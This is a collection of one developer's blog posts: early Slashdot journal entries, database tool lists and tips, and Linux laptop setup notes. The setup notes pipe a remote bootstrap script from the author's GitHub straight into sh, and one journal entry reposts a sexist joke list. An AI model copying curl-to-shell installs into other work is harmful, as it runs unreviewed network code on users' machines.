[Let me know](mailto:<EMAIL>) if you use this approach and if it works for you or not.
## What about normal feature development?
You could theoretically have the product owner manage all the forthcoming product features in their column. I think it is better for them to continue to manage the product's feature backlog in the existing jira/trello/github project system, which will now be beautifully free from tech debt, random ideas and other clutter. This is what we did and it worked great.
## Bonus ideas
* Add a label "next sprint", and get people to tag the cards they think should happen next.
* Technical debt often ends up here, read this <http://laughingmeme.org/2016/01/10/towards-an-understanding-of-technical-debt/> to be able to talk more coherently about this topic.
* Turn on voting in trello and vote on each other's cards.
## Did it work for you?
This setup worked superbly for us as a team and I'd recommend it to anyone who'll listen.
We no longer have the overhead of a product owner losing the will to live trying to understand cryptic tech debt cards left by a previous developer, wondering if they were trivial or pending catastrophes.
When someone leaves, the new person or others on the team can look over their cards and decide what to move into their own column.
## Also available on the podcast
If you like this, you might want to have a listen to me and David talking about this and other lessons learned in [episode 8 of software should be free - Hiding from Covid-19 and the end of 2 years at DfE](https://pod.timwise.co.uk/8).
<file_sep>---
title: "why am i here"
date: 2004-11-13
slashdot_url: https://slashdot.org/journal/90243/why-am-i-here
---
<p>From the dnrc newsletter. Say bye bye to your eyes for reading this, especially here in my "blog".</p>
<blockquote>
<div>
<p> <i><br>Dear Dogbert,</i></p>
<p><i>Lots of people write blogs, but I've never heard of anyone who actually reads them. What's up with that?</i></p>
<p><i>Kurt</i></p>
<p><i>Dear Skirt,</i></p>
<p><i>Blogs exist to fill the important market niche of writing that is so dull that your eyes will burrow out of the back of your head to escape. People do read blogs, usually by accident, sometimes on a dare, but those readers are later mistaken for Mafia victims with what appears to be two holes in the back of their heads. On closer inspection, you might find their eyeballs clinging to the drapes directly behind them. Unless the cat gets them first.</i></p>
<p><i>Sincerely,</i></p>
<p><i>Dogbert<br></i></p>
</div> </blockquote>
<p>In other news I feel like a complete c*** today.<br>Where is everybody?</p>
<file_sep>---
title: "Picture-skew"
date: 2004-08-17
slashdot_url: https://slashdot.org/journal/80582/picture-skew
---
<p>Nice <a href="http://www.timwise.co.uk/images/IMG_3919.JPG">here</a>, and <a href="http://www.timwise.co.uk/images/IMG_3955.JPG">here</a>.</p>
<file_sep>---
title: Database migration options for dotnet core
layout: post
---
## Options
* [Built-in EF Core migrations](https://docs.microsoft.com/en-us/ef/core/managing-schemas/migrations/?tabs=dotnet-core-cli)
* [FluentMigrator](https://fluentmigrator.github.io/)
* [DbUp](http://dbup.github.io/)
* [RedGate Deploy](https://www.red-gate.com/products/redgate-deploy/)
* [RedGate SQL Change Automation](https://documentation.red-gate.com/sca/developing-databases/concepts/migrations/migration-scripts)
* [Flyway by RedGate](https://flywaydb.org/)
* [SqlHawk](http://timabell.github.io/sqlHawk/) (I wrote this years ago, forked from the excellent [SchemaSpy](http://schemaspy.org/))
* ? [hit me up on twitter](https://twitter.com/tim_abell) if you know of any more options
Note that the excellent [ReadyRoll got bought by
RedGate](https://www.realwire.com/releases/Redgate-acquires-database-migrations-and-deployment-tool-ReadyRoll)
and renamed to something I can never remember.
## See also
* <https://stackoverflow.com/questions/46649238/alternative-to-redgate-readyroll-yet>
<file_sep>---
title: "swimming"
date: 2004-07-28
slashdot_url: https://slashdot.org/journal/78736/swimming
---
<p>went swimming. now really tired.<br>on phone to australia now, relaying all the gossip that I couldn't possibly put on a public website!</p>
<file_sep>---
layout: post
title: Database tools I was surprised existed
description: A complete list of tools for database people and developers
category: blog
---
But you already know all the tools for working with databases don't you?
That's what I thought too before I started working on [SQL Schema
Explorer](http://schemaexplorer.io/). Even after 18 years working with
databases it turns out I only knew a fraction of the tools that are out there.
Working on SQL Schema Explorer gave me a reason I didn't have before to search
the internet in new ways relating to databases, and now that I'm reaching out
to people about SQL Schema Explorer people are in turn sharing their favourite
tools with me.
I'd hate for this gift to sit hidden away in my private product trello board,
so I've turned it into this article so that you can skip the wilderness years
and gain a zen-like awareness of all the tools of your trade. I'm sure you
won't like or use all of them, and many overlap in function, but the following
list will allow you to try out and asses each one against your needs; perhaps
you'll find a new tool that will save you hours, or make your job that much
more enjoyable. Never again will you have to say to a new colleague "oh I
hadn't heard of that one!".
## Microsoft Sql Server
### SSMS Tools Pack
<https://www.ssmstoolspack.com/>
An add-on to management studio that improves many pieces of of ssms and adds new capabilities.
{:height="200px"}
* €30 for first computer to €5000 for unlimited enterprise use ([SSMS Toolpack
Pricing page](https://www.ssmstoolspack.com/Licensing))
A friend of mine saved many hours using the "CRUD" stored procedure generation capabilities.
### Sql Server Management Studio (SSMS)
Okay you know this one but I have to mention it.
It has awkward but functional diagram support. You can version control these
diagrams and move them between servers with
<https://github.com/timabell/database-diagram-scm> which is worth knowing about
if you ever use the ssms diagrams.
### You can now run MSSQL on open source
Did you know Microsoft SQL Server (aka mssql) is now available on both linux
natively and in docker containers? It's the real deal, not like mono vs .net
* [SQL Server on Linux](https://docs.microsoft.com/en-us/sql/linux/sql-server-linux-setup)
* [SQL Server in Docker](https://docs.microsoft.com/en-us/sql/linux/quickstart-install-connect-docker?view=sql-server-2017)
Here's all it takes to fire up mssql, the only pre-requisite is docker itself.
docker run -e 'ACCEPT_EULA=Y' -e 'SA_PASSWORD=<PASSWORD>' \
-p 1433:1433 --name mssql1 \
-d mcr.microsoft.com/mssql/server:2017-latest
This isn't a tool per-se, but this is too important to not mention, especially
as it's quite new and not everyone is aware of this exciting change from
redmond.
I don't know about you but one less reason to fire up the Windows VM sure does
make me happy. Combined with dotnet core I haven't fired up Windows in months
now.
## Cross-database
### Razor Sql
{:height="200px"}
<http://www.razorsql.com/>
> "RazorSQL is an SQL query tool, database browser, SQL editor, and database
> administration tool for Windows, macOS, Mac OS X, Linux, and Solaris.
> RazorSQL has been tested on over 40 databases, can connect to databases via
> either JDBC or ODBC"
### EZ Data Browser
{:height="200px"}
<http://www.softimum-solutions.com/Data-Browser/Overview.aspx>
* $29.99 per computer
* Licence key by email
* pay via PayPal of credit card
> "software from Softimum Solutions to help users to browse and to edit SQL Server databases quickly and easily"
Provides a configurable MSAccess-like interface to a database.
### SQLeo
Cross-database query builder/analyser. Feature rich - data/schema compare, pivot queries, diagrams etc.
{:height="200px"}
* <http://sqleo.sourceforge.net/>
> "A powerful SQL tool to transform or reverse complex queries (generated by
> OBIEE, Microstrategy, Cognos, Hyperion, Pentaho ...) into diagrams to ease
> visualization and analysis. A graphical query builder that permits to create
> complex SQL queries easily. The GUI with multi-connections supports virtually
> all JDBC drivers, including ODBC bridge, Oracle, MySQL, PostgreSQL, Firebird,
> HSQLDB, H2, CsvJdbc, SQLite. And top of that, everything is open-source!"
* [SQLeo demo video on youtube](https://www.youtube.com/watch?v=emDrdj0IxNI)
* Sourceforge page (ugh) <https://sourceforge.net/projects/sqleo/>
* Fork on github <https://github.com/ojwanganto/SQLeo>
### SQL Fiddle
Live online sql editor / runner
{:height="200px"}
* <http://sqlfiddle.com/>
### DbSchema
{:height="200px"}
* <http://www.dbschema.com/>
> "DbSchema is an SQL and No-SQL database designer featuring interactive
> diagrams, HTML and PDF documentation, schema versioning and migration,
> relational data browse, random data generator, visual query builder, SQL
> editor and database reports."
### DbPrompt
{:height="200px"}
* <http://www.dbschema.com/dbprompt.html>
> "Free Universal Multi-Database SQL Prompt - DbPrompt can execute queries on
> multiple databases, transfer data between databases, upload result files on
> ftp servers, execute complex SQL scripts using Java Groovy and cron-schedule
> scripts for execution and report failures per email. DbPrompt supports all
> SQL and NoSQL databases, like MySql, Cassandra, PostgreSql, MongoDb,
> Redshift, SqlServer, Azure, Oracle, Teradata and more. DbPrompt can work on
> all operating systems. DbPrompt is free of charge. "
## Unsorted - omg will it never end
* <http://www.magereverse.com/>
* <https://dataedo.com/>
* <https://dbvis.com/>
* <https://docs.microsoft.com/en-us/sql/azure-data-studio>
* <https://github.com/ajdeziel/SQL-Data-Viewer> - abandoned
* <https://github.com/preston/railroady/>
* <https://help.talend.com/reader/ISPDm8GQ6s0HN0348QulWg/Ij~7tBlW8im63rAGnGHT3A>
* <https://portableapps.com/apps/development/database_browser_portable>
* <https://redash.io/>
* <https://sequelpro.com/>
* <https://softwarerecs.stackexchange.com/questions/11346/tool-to-visualize-sql-database-schema>
* <https://sqldbm.com/en/>
* <https://sqlitestudio.pl/>
* <https://www.codediesel.com/data/5-tools-to-visualize-database-schemas/>
* <https://www.datasparc.com/>
* <https://www.dbsoftlab.com/online-tutorials/active-table-editor-online-tutorials.html>
* <https://www.devart.com/dbforge/sql/studio/>
* <https://www.idera.com/er-studio-data-architect-saftware>
* <https://www.jetbrains.com/datagrip/> - <https://www.youtube.com/watch?v=Xb9K8IAdZNg>
* <https://www.metabase.com/>
* <https://www.navicat.com/en/products/navicat-data-modeler>
* <https://www.schemacrawler.com/>
* <https://www.sqlservercentral.com/articles/microsoft-sql-server-utilities-and-tools-1>
* <https://jetbrains.com/> intellij/rider/rubymine etc all have the datagrip capabilities built in
* <https://www.red-gate.com/> sql prompt etc
* <https://www.oracle.com/database/technologies/appdev/datamodeler.html>
* <https://erwin.com/products/erwin-data-modeler/>
* DBeaver
* Azure Data Studio - PostgreSQL extension
* SAP PowerDesigner <https://www.sap.com/products/powerdesigner-data-modeling-tools.html> - I have no idea what this is. Sounds enterprisey.
* <https://en.wikipedia.org/wiki/PowerDesigner>
* <https://www.idera.com/er-studio-enterprise-data-modeling-and-architecture-tools>
* <https://www.idera.com/er-studio-data-architect-software>
* <https://sparxsystems.com/products/ea/>
* <https://www.ibm.com/us-en/marketplace/infosphere-data-architect>
* <https://www.postgrescompare.com/>
## Places to find even more database tools and learn more
* <https://en.wikipedia.org/wiki/Comparison_of_database_tools>
* <https://www.quora.com/How-do-I-generate-an-entity-relationship-diagram-for-a-SQLite-database-file?share=1>
* <https://www.quora.com/What-are-some-good-online-database-schema-design-tool-with-larger-days-of-expiry>
* <https://alternativeto.net/software/mysql-workbench/>
* <https://www.datasciencecentral.com/profiles/blogs/top-6-data-modeling-tools>
* <https://www.educba.com/9-best-data-modeling-tools/>
* <http://www.agiledata.org/essays/dataModeling101.html> - I had no idea what data modelling really meant before reading this.
* <http://www.sqlservercentral.com/articles/Tools/157911/>
* <https://www.apgdiff.com/>
* <http://toolsfordatabases.com/>
* <https://www.webfx.com/blog/web-design/top-five-best-database-management-tools/>
* <https://solutionsreview.com/data-management/data-management-solutions-directory/>
* <https://www.softwaretestinghelp.com/tools/26-best-data-integration-tools/>
## Information overload
If you got this far you probably need to get back to work. It's clear this
article is a bit ridiculous now so I'm not going to carry on sorting it out.
The internet is littered with catalog articles of varying completeness and
quality. To make it complete and good would make it dull and endless.
Watch this space, I think I'll try and work out what people actually are trying
to do and cater for that. Maybe we can all build a collaborative index
somewhere.
## The end
I hope you found at least a few you didn't know about and that they make your
life better in some way. Please do tell me the story of how this helped you on
[email](<EMAIL>) or [twitter](https://twitter.com/tim_abell).
Did I miss something? If you wish to improve this article please ping me a PR
with additions here: https://github.com/timabell/sdv-website or just [email
me](<EMAIL>).
I'm not being paid to promote these, these are not affiliate links, I share
this learning with you all for free so that we can all enjoy our work with
databases more, and create better more reliable databases for ourselves, our
clients and our projects.
If you want to be notified of new articles, sign up to the mailing list (which
currently is also the trial download list).
Till next time!
Originally posted at <a href="http://schemaexplorer.io/blog/2019/06/10/database-tools-you-didnt-know-about.html">http://schemaexplorer.io/blog/2019/06/10/database-tools-you-didnt-know-about.html</a>
<file_sep>---
title: "Nothing much"
date: 2004-10-15
slashdot_url: https://slashdot.org/journal/87058/nothing-much
---
<p>Play was cool, as expected, it's your last chance to see it tonight.</p>
<p>I just compiled a C++ program on linux<nobr> </nobr>:)<br>well, an example one, but I did change hello world to hello bob. Not a quite a killer app, but a step in the right direction. More to follow I expect.</p>
<file_sep>---
title: "busy"
date: 2004-11-30
slashdot_url: https://slashdot.org/journal/91683/busy
---
<p>i've been real busy lately with rehearsals etc. I'm moving house soon so gis' a shout on the old email if you want me new address.</p>
<p>For anyone who doesn't know ants is likely to be out of the country soon, call me / her for details</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
title: "funky technology"
date: 2005-08-19
slashdot_url: https://slashdot.org/journal/114890/funky-technology
---
<p>get down to the groove of the new HDD storage science!</p>
<p><a href="http://www.hitachigst.com/hdd/research/recording_head/pr/PerpendicularAnimation.html">http://www.hitachigst.com/hdd/research/recording_head/pr/PerpendicularAnimation.html</a><br>flash movie, with hip sound track.</p>
<p>Source:<br><a href="http://hardware.slashdot.org/article.pl?sid=05/08/19/0027237">http://hardware.slashdot.org/article.pl?sid=05/08/19/0027237</a></p>
<file_sep>#!/bin/sh -v
(
while ! nc -z localhost 4000; do sleep 0.1; done # https://stackoverflow.com/questions/27599839/how-to-wait-for-an-open-port-with-netcat
xdg-open http://localhost:4000/
) &
bundle exec jekyll s --livereload $@
<file_sep>---
title: "Wrinkly hands"
date: 2003-10-13
slashdot_url: https://slashdot.org/journal/48982/wrinkly-hands
---
<p>Did the washing up this evening.</p>
<p>woo.</p>
<p>+2 brownie points with gf.</p>
<p>read<nobr> </nobr>/. & b3ta this evening.</p>
<p>-20 points with gf<nobr> </nobr>:(</p>
<p>ps.<br>hello Joel.</p>
<file_sep>---
title: "Busy busy"
date: 2004-08-10
slashdot_url: https://slashdot.org/journal/79902/busy-busy
---
<p>Life is good.<br>I'm far too busy to write anything interesting in my journal so instead here's the possibly sexist joke that fluffy sent me last week.</p>
<p>Made me laugh anyway. Well I had had quite a few drinks and it was about 1am.</p>
<p>==============</p>
<p>We always hear "the rules" from the female side. Now here are the rules</p>
<p>from the male side.</p>
<p>These are our rules:</p>
<p>Please note... these are all numbered "1" ON PURPOSE!</p>
<p>1. Breasts are for looking at and that is why we do it. Don't try to</p>
<p>change that.</p>
<p>1. Learn to work the toilet seat. You're a big girl. If it's up, put it</p>
<p>down. We need it up, you need it down. You don't hear us complaining</p>
<p>about you leaving it down.</p>
<p>1. Saturday = sports. It's like the full moon or the changing of the</p>
<p>tides. Let it be.</p>
<p>1. Shopping is NOT a sport. And no, we are never going to think of it</p>
<p>that way.</p>
<p>1. Crying is blackmail.</p>
<p>1. Ask for what you want. Let us be clear on this one: Subtle hints do</p>
<p>not work! Strong hints do not work! Obvious hints do not work! Just say</p>
<p>it!</p>
<p>1. Yes and No are perfectly acceptable answers to almost every question.</p>
<p>1. Come to us with a problem only if you want help solving it. That's</p>
<p>what we do. Sympathy is what your girlfriends are for.</p>
<p>1. A headache that lasts for 17 months is a problem. See a doctor.</p>
<p>1. Anything we said 6 months ago is inadmissible in an argument. In</p>
<p>fact, all comments become null and void after 7 days.</p>
<p>1. If you think you're fat, you probably are. Don't ask us.</p>
<p>1. If something we said can be interpreted two ways, and one of the ways</p>
<p>makes you sad or angry, we meant the other one.</p>
<p>1. You can either ask us to do something or tell us how you want it</p>
<p>done. Not both._ If you already know best how to do it, just do it</p>
<p>yourself.</p>
<p>1. Whenever possible, please say whatever you have to say during</p>
<p>commercials.</p>
<p>1. <NAME> did not need directions and neither do we.</p>
<p>1. ALL men see in only 16 colours, like Windows default settings. Peach,</p>
<p>for example, is a fruit, not a colour. Pumpkin is also a fruit. We have</p>
<p>no idea what mauve is.</p>
<p>1. If it itches, it will be scratched. We do that.</p>
<p>1. If we ask what is wrong and you say "nothing," we will act like</p>
<p>nothing's wrong. We know you are lying, but it is just not worth the</p>
<p>hassle.</p>
<p>1. If you ask a question you don't want an answer to, expect an answer</p>
<p>you don't want to hear.</p>
<p>1. When we have to go somewhere, absolutely anything you wear is fine.</p>
<p>Really.</p>
<p>1. Don't ask us what we're thinking about unless you are prepared to</p>
<p>discuss such topics as Sex, Sport, or Cars.</p>
<p>1. You have enough clothes.</p>
<p>1. You have too many shoes.</p>
<p>1. I am in shape. Round is a shape.</p>
<p>1. Thank you for reading this; Yes, I know, I have to sleep on the couch</p>
<p>tonight, but did you know men really don't mind that, it's like camping.</p>
<file_sep>---
layout: post
title: 5 ways to make your database better - by <NAME>
description: Step up your database game with these top tips.
category: blog
---
## [1] Documentation
Shoot me okay, but maintenance of software is [insert large number here] times
the cost of creation, especially with relational databases. You are a pro
working for a client, you owe it to them to make it possible for them to have
future staff (and yourself!) be as effective as possible. You put all that
effort into figuring out why a column should exist and have that name, now
share that knowledge before you move on to the next greenfield project
* [Redgate SqlDoc](https://www.red-gate.com/products/sql-development/sql-doc/)
is great for rapidly adding missing documentation.
* [SchemaSpy](http://schemaspy.org/) generates static html sites making it easy
to see what documentation there is (or isn't!) and share it with the team.
It's free & open source (although a bit fiddly to set up and run). It has
particularly nice clickable diagrams.
* [Dataedo generates static html sites &
pdfs](https://dataedo.com/tutorials/getting-started/generating-database-documentation)
as well, and is commercial and slicker than SchemaSpy
* This [gist for source-controlling ms_description
attributes](https://gist.github.com/timabell/6fbd85431925b5724d2f) gives you
a two-way source-controllable / editable list of your documentation in SQL
Server
* [SQL Schema Explorer](http://schemaexplorer.io/) generates dynamic html sites
making it easy to see what documentation there is and share it with the team.
## [2] Refactor your database
Migrations are a thing now. Use them. You refactor your code, why wouldn't you
refactor your database? Stop leaving landmines for future people - misleading
names, bad structures etc. Use the redgate tools (ready-roll etc), use your
orm’s tools (EF migrations, active record migrations). Yes you have to deal
with data, but it’s the exception not the rule that it’s going to take hours to
run because of data volumes.
* [Redgate's SQL Change
Automation](https://www.red-gate.com/products/sql-development/sql-change-automation/)
(formerly
[ReadyRoll](https://www.red-gate.com/blog/working/from-release-engineer-to-readyroll-founder-and-redgate-product-manager))
is an opinionated tool for creating and running database migrations, it even
generates Database Administrator (DBA) friendly pure-sql deployment packages.
Very impressive!
* [Redgate's SQL Source Control supports
migrations](https://documentation.red-gate.com/soc6/common-tasks/working-with-migration-scripts)
* I've been using [EF Core
migrations](https://docs.microsoft.com/en-us/ef/core/managing-schemas/migrations/)
recently and they work well. There are equivalents for all the major
platforms.
## [3] Enforce data integrity
Does your app fall over if the data is bad? Databases have many powerful ways
of enforcing the rules your code relies on: nullability, foreign keys, [check
constraints](https://www.w3schools.com/SQL/sql_check.asp), unique constraints.
Stop the bad data before it even gets in there. Now your database is enforcing
these rules your code doesn't have to handle violations of them when reading
data because they'll never happen
## [4] Integration testing
You have an ORM. Great. You have unit tests. Great. But where the rubber hits
the road and your code sends SQL to a real database it breaks at runtime more
often than you’d like to admit because the generated sql didn't jive with the
real database structure or data in some obscure fashion. Automate the
creation/test/destruction of your db and run full end to end integration tests.
I suggest automating from the layer below the UI to keep the tests fast. There
are many techniques for keeping the tests quick but still realistic: do end to
end smoke tests instead of individual pieces, use an in-memory database, use
[database
snapshots](https://gist.github.com/timabell/3164291#file-create-snapshot-sql)
or the fancy [sql-clone](https://www.red-gate.com/products/dba/sql-clone/index)
tool from Redgate to make creation / rollback virtually instant. Can you pull
realistic (anonymised) data from production? Better still, now you’ll catch a
whole new class of bugs before they hit prod.
* Here's [a guide from Redgate detailing one way to do continuous integration
testing with
databases](https://www.red-gate.com/simple-talk/sql/sql-tools/continuous-integration-for-databases-using-red-gate-tools/)
## [5] Make it visible
Are the only people that can see the database structures the coders and DBAs?
do the business owners, support people, Quality Assurance (QA) people find it a
mystery? You should be just as proud of your database as you are of your code,
by shining a light on this dark corner of your digital estate you can make it
as good as it should be, not an embarrassing backwater. By sharing the database
in an accessible form to the non-coders in your team you can help them be more
effective in their jobs.
* The html generated by [SchemaSpy](http://schemaspy.org/) can be shared on any
webserver to let your whole team see your schema structures
* [SQL Schema Explorer](http://schemaexplorer.io/) can be run on your network
or cloud hosting ([schema explorer is
dockerized](https://hub.docker.com/r/timabell/sdv/)!) to give your team easy
access to both the schema and data within the database.
Combine these tools with a continuous integration system and you have easy
access to the bleeding edge of your databases development.
## Take action now!
1.Make a start on at least one of these improvements today.
2.Share this article with your team - get everyone motivated to improve.
3.Share this article on social media - help spread the word that our
databases deserve better!
I hope this has inspired you to make an improvement in the often unloved
underbelly of your applications.
What do you think needs improving in the way we deal with databases? What
change did you make because of this? [Let me
know!](mailto:<EMAIL>?subject=making better databases)
Originally posted at
[http://schemaexplorer.io/blog/2018/07/10/5-ways-to-make-your-database-better.html](http://schemaexplorer.io/blog/2018/07/10/5-ways-to-make-your-database-better.html)
<file_sep>---
title: "M4 J11 Reading plans"
date: 2006-07-07
slashdot_url: https://slashdot.org/journal/139223/m4-j11-reading-plans
---
<p><a href="http://news.bbc.co.uk/1/hi/england/berkshire/5154816.stm">http://news.bbc.co.uk/1/hi/england/berkshire/5154816.stm</a></p>
<p><a href="http://www.pba.co.uk/keyprojects.asp?ID=29">http://www.pba.co.uk/keyprojects.asp?ID=29</a></p>
<p><a href="http://www.reading.gov.uk/Documents/transport_streets/M4J11Map1.pdf">http://www.reading.gov.uk/Documents/transport_streets/M4J11Map1.pdf</a></p>
<p><a href="http://www.reading.gov.uk/Documents/transport_streets/1211MajorSchemes.pdf">http://www.reading.gov.uk/Documents/transport_streets/1211MajorSchemes.pdf</a></p>
<p>(Thanks Liz)</p>
<file_sep>---
title: "Wow. I've never had it so good."
date: 2004-07-11
slashdot_url: https://slashdot.org/journal/77075/wow-ive-never-had-it-so-good
---
<p>Life could not be better.</p>
<p>I haven't been this happy for many years. It really hit me when I was driving home tonight from seeing andy 'n co. I was half way home when I felt this huge wave of happiness course through my veins and I broke into a huge uncontrollable smile. It lasted for ages, and I'm still glowing. (<nobr> </nobr>:^D)</p>
<p>Right now I'm listening to the streets on bbc radio 1, and even though it's one of the saddest most moving songs I've ever heard, nothing could bring me down now. I love that tune.</p>
<p>I started my new job at <a href="http://www.emapsite.com/">emapsite</a> last monday and have been thoroughly enjoying it. The people are great and I'm relishing the challenge of a new beginning. I was even happy to head to London on company business!</p>
<p>Which... was the start of a blinding weekend. Sat finished with me rolling into Twyford station at around half ten this morning (Sunday). I've never missed the last train before but I was way to busy living life to worry about little things like that! Besides it was a good opportunity to see my best mate over in sunny croyden. Most appreciated, thanks a mil darling, I owe you big time (again!).</p>
<p>I regained a close friend this weekend who I had so carelessly lost. I hope there's no hard feelings and I'm looking forward to making up for lost time. I really appreciated being able to talk so freely, like I haven't for a long time. By the way, I have to give a huge thank you to all of my wonderful friends who have stuck by me through hard times, especially ants, coz, kev, andy, ellie, tom, 'laine, and some of my newer friends who probably won't read this! No regrets. Looking forward to more good times. And congrats to Anna, I wish you all the best.</p>
<p>Woah, that was a bit heavy. On a lighter note, I had a great day today helping to build a cardboard kiddy house with andy and 'lainey, pictures will follow after tuesday. I also managed to just about play the first few bars of new tune on the keyboard. I really think I might get somewhere with this music thing.</p>
<p>In other timmy news, I'm looking forward to a forthcoming triathlon relay race, in a kind of nervous way. I feel really good from all the fitness I've gained in the last nine months.</p>
<p>Time for sleep. Wish me luck for everything this week throws at me, and I wish you happiness where ever and who ever you are. Thanks for reading.</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
title: "colds. ugh"
date: 2005-11-29
slashdot_url: https://slashdot.org/journal/123212/colds-ugh
---
<p>today I have a cold.<nobr> </nobr>:(</p>
<p>oh, and i did write a journal entry the other day, but my computer died b4 I could post it.</p>
<p>it looks like usage of bebo.com is taking off amongst my friends, which is good.</p>
<p>Plan to see Tom this weekend, looking forward to that.</p>
<file_sep>---
title: Laptop setup notes
description: Clean install to functioning workhorse
layout: post
---
This is mostly for my benefit YMMV. Used for XPS13 and XPS15. Last run with Linux Mint Cinnamon 20.2 LTS.
Things to go from blank machine to fully functioning work laptop.
## Why not use machine images?
Because when you want to upgrade your OS image you have to do this anyway.
## But this will break!
Indeed, and it does, a continuous labour of love. Ideas welcome!
## OS install
* [Download mint cinnamon x64 torrent](https://linuxmint.com/download.php)
* Burn to USB stick
* [Configure Dell XPS 13 to use AHCI mode](https://askubuntu.com/questions/696413/ubuntu-installer-cant-find-any-disk-on-dell-xps-13-9350/696414#696414)
* Boot to stick with `F12`
* Install mint
* Full disk encryption (LUKS), default whole disk partitioning
* Run updates and reboot `sudo apt update && sudo apt upgrade`
## Hibernate / hybrid sleep (unfinished)
Not working at moment, needs more research.
* Enable hibernate?
* Bigger swap?
### Half-arsed research into hibernate
* <https://superuser.com/questions/1539378/what-size-swap-partition-will-allow-a-mint-19-3-installation-with-64g-ram-to-hib?noredirect=1&lq=1>
* <https://superuser.com/questions/1434301/enabling-hibernate-on-linux-mint-19-1?noredirect=1&lq=1>
* <https://help.ubuntu.com/community/SwapFaq>
* <https://unix.stackexchange.com/questions/568093/enable-hibernation-in-power-management>
* <https://dewaka.com/blog/2021/04/08/linux-mint-hibernate/>
* <https://www.fosslinux.com/45454/enable-hibernate-mode-linux-mint.htm>
* <https://askubuntu.com/questions/12383/how-to-go-automatically-from-suspend-into-hibernate>
* <https://www.reddit.com/r/linuxmint/comments/93ta9u/enable_hibernation_in_linux_mint_19_tara/>
## Packaged software install
* Bootstrap my dotmatrix package list [my bootstrap file](https://github.com/timabell/dotmatrix/blob/master/software/bootstrap.sh) like this (don't laugh/cringe):
```
curl https://raw.githubusercontent.com/timabell/dotmatrix/master/software/bootstrap.sh | sh
```
This installs my [usual package list](https://github.com/timabell/dotmatrix/blob/master/bin/packages.txt)
## Hardware
* Disable nvidia GPU in favour of intel card
```
sudo prime-select intel
```
## zsh
* Switch to z-shell `chsh -s /usr/bin/zsh`
Ref: <https://askubuntu.com/questions/131823/how-to-make-zsh-the-default-shell/131838#131838>
## inotify
* inotify increase for:
* RubyMine
* Guard - <https://github.com/guard/listen/wiki/Increasing-the-amount-of-inotify-watchers>
* Syncthing - <https://docs.syncthing.net/users/faq.html#inotify-limits>
```
echo fs.inotify.max_user_watches=524288 | sudo tee -a /etc/sysctl.conf && sudo sysctl -p
```
## File sync with syncthing
* Run syncthing-gtk from system menu (auto-installs syncthing binary)
* [Configure syncthing](http://localhost:8080/) not to route over internet
(no relay, no public discovery, no NAT traversal)
* [Configure firewall-config](https://firewalld.org/documentation/utilities/firewall-config.html)
to allow syncthing
* Add manual service syncthing
* Allow tcp 22000 and 21027 udp
* Make home network use home zone
* Add syncthing to home zone
* Runtime to permanent

* Remove old install machine name from syncthing network
* Tell new and old devices about each other in syncthing
* watch `~/Documents` etc. magically sync (amazing)
## All the things from dotmatrix
```
cd repo/dotmatrix/
bin/symlinks.sh
bin/install
software/delta.sh
# etc
```
## Link local git config
```
cd ~
ln -s ~/Documents/config/.gitconfig.local
```
## Desktop/system config
* Setup touchpad
* Set mouse and trackpad speed/acceleration to max
* Enable horizontal touchpad scroll

* Setup terminal colours and turn off transparency

* Turn off all the system sounds and turn the volume down to 0%.
* Customize time in task bar to ` 📅 %a %e %b %Y 🕓 %H:%M:%S `.
* Lock screen with `Win+L` - start > keyboard > system > lock screen (Windows user habits).
* Turn on automatic updates in update manager preferences, and automatic obsolete kernal removal.
* Configure nemo file manager to always use list view.
* Add workspace switcher applet to taskbar.
## Firefox
* Sign-in to sync
* Remove firefox tabs (because I use [Tree Style Tabs](https://addons.mozilla.org/en-US/firefox/addon/tree-style-tab/))
* `cd ~/.mozilla/firefox/<profile_id_folder>/`
* `mkdir chrome`
* `echo '#TabsToolbar { visibility: collapse !important; }' >> chrome/userChrome.css`
* about:config > `toolkit.legacyUserProfileCustomizations.stylesheets` > `true`
* restart firefox
Reference: <https://superuser.com/questions/1268732/how-to-hide-tab-bar-tabstrip-in-firefox-57-quantum#1268734>
## Startup list
* Menu > Startup Applications
* Adjust to current tastes
* Add additional startup apps:
* Syncthing GTK
## Non-apt program installations
* Use Applets config to download and add [Pomodoro timer](https://cinnamon-spices.linuxmint.com/applets/view/131) in task bar.
* Install [jetbrains toolbox](https://www.jetbrains.com/toolbox/app/)
* [Install flatpak apps from dotmatrix](https://github.com/timabell/dotmatrix/blob/master/software/flatpaks.sh), sign in to them all
* [Give flatpak access wider home folder access](https://askubuntu.com/questions/1086529/how-to-give-a-flatpak-app-access-to-a-directory/1247345#1247345) (for sending pics) with [flatseal](https://flathub.org/apps/details/com.github.tchx84.Flatseal)
* Install all the other things in [dotmatrix/software](https://github.com/timabell/dotmatrix/tree/master/software)
## SSH
* Generate ssh key `ssh-keygen`
* [Add public key to github](https://github.com/settings/keys)
## Postgres
[Use a docker image](https://hackernoon.com/dont-install-postgres-docker-pull-postgres-bee20e200198)
## XPS firmware updates
```
fwupdmgr get-devices
fwupdmgr get-updates
fwupdmgr update
```
refs:
* <https://fwupd.org/lvfs/docs/users>
## Shutter
* Change default save location to `~/tmp/shutter` (new folder)
* change filename to `shutter_%Y%-m-%d_%NN`
## Thunderbird
* Restore recent backup (from data sync)
## asdf
* [install asdf version manager](https://asdf-vm.com/#/core-manage-asdf-vm?id=install-asdf-vm) for all the things (ruby, node, golang etc.)
## NodeJs setup
asdf plugin-add nodejs
bash ~/.asdf/plugins/nodejs/bin/import-release-team-keyring
asdf install nodejs 8.16.1
node -v
Keyring because nodejs packages are signed and validated
<https://github.com/asdf-vm/asdf-nodejs#install>
## Ruby
asdf plugin add ruby
cd some-project
asdf install
gem install bundler
## See also
* <https://github.com/thoughtbot/laptop>
<file_sep>---
title: "**No Title**"
date: 2004-06-18
slashdot_url: https://slashdot.org/journal/74860/
---
<p>Just read something Ellen wrote for me years ago whilst going through some of my paper.</p>
<p>Made me think.</p>
<p>I'm really very lonely at the moment.</p>
<p>There's so many things I tried to ignore at the time, I didn't read half the things she gave me at the time because it was all a bit much, now going back is very strange.</p>
<file_sep>---
layout: post
title: Contract developer to entrepreneur - resources
date: 2018-02-16 22:31:38.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2018/02/16/contract-developer-to-entrepreneur-resources/"
---
I'm not there yet so I'm no authority, but here's some things that I think are fab resources on my journey. They are helping me change my thought patterns and behaviour to make success more likely.
## Books (roughly in order of my journey)
